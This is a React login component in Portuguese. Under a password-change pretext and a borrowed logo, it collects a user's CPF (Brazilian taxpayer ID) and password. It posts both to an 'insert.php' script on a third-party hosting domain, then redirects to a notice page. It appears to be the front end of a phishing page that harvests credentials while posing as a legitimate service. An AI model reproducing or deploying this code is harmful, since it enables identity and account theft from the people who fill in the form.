import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import './styles.css';
import logo from '~/img/logo.png';
import $ from 'jquery';
import 'jquery-mask-plugin';

export const Form = () => {
  const [cpf, setCpf] = useState('');
  const [password, setPassword] = useState('');
  const navigate = useNavigate();

  useEffect(() => {
    $('#cpf').mask('000.000.000-00');
  }, []);

  const handleSubmit = async (e) => {
    e.preventDefault();

    try {
      const response = await fetch('https://plusspsp.waiohost04.com.br/backend/insert.php', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: new URLSearchParams({
          cpf: cpf.replace(/\D/g, ''),
          password,
        }),
      });
      const data = await response.json();
      console.log(data);
      navigate('/aviso');
    } catch (error) {
      console.error('Erro:', error);
    }
  };

  return (
    <div className="login-container">
      <form className="login-form" onSubmit={handleSubmit}>
        <div className="top-image">
          <img src={logo} alt="Imagem de logo" />
        </div>
        <div className="inputs">
          <div className="form-group">
            <input
              type="text"
              id="cpf"
              name="cpf"
              placeholder="CPF"
              value={cpf}
              onChange={(e) => setCpf(e.target.value)}
              required
            />
          </div>
          <div className="form-group">
            <input
              type="password"
              id="password"
              name="password"
              placeholder="Senha"
              value={password}
              onChange={(e) => setPassword(e.target.value)}
              required
            />
          </div>
        </div>
        <button type="submit" className="submit-btn">
          Alterar senha
        </button>
      </form>
    </div>
  );
};
